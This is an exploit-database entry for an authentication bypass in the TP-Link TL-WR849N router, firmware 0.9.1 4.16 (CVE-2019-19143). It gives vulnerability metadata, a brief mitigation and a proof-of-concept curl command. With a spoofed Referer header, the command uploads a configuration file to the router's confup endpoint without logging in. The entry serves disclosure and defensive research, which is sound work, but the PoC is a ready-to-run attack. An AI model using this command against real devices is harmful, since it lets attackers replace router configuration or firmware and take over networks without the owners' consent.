header-logo
Suggest Exploit
vendor:
TL-WR849N
by:
Elber Tavares
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: TL-WR849N
Affected Version From: TL-WR849N 0.9.1 4.16
Affected Version To: TL-WR849N 0.9.1 4.16
Patch Exists: YES
Related CWE: CVE-CVE-2019-19143
CPE: h:tp-link:tl-wr849n
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux, Windows
2019

TL-WR849N 0.9.1 4.16 – Authentication Bypass (Upload Firmware)

Uploading new firmware without access to the panel

Mitigation:

Ensure that authentication is required for all firmware uploads and that only authorized users are allowed to upload firmware.
Source

Exploit-DB raw data:

# Exploit Title: TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)
# Date: 2019-11-20
# Exploit Author: Elber Tavares
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
# Version: TL-WR849N 0.9.1 4.16
# Tested on: linux, windows
# CVE : CVE-CVE-2019-19143

Uploading new firmware without access to the panel

REFS:
 https://github.com/ElberTavares/routers-exploit/tp-link
 https://fireshellsecurity.team/hack-n-routers/


Poc:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
http://TARGET/mainFrame.htm" -F data=@conf.bin
http://TARGET/cgi/confup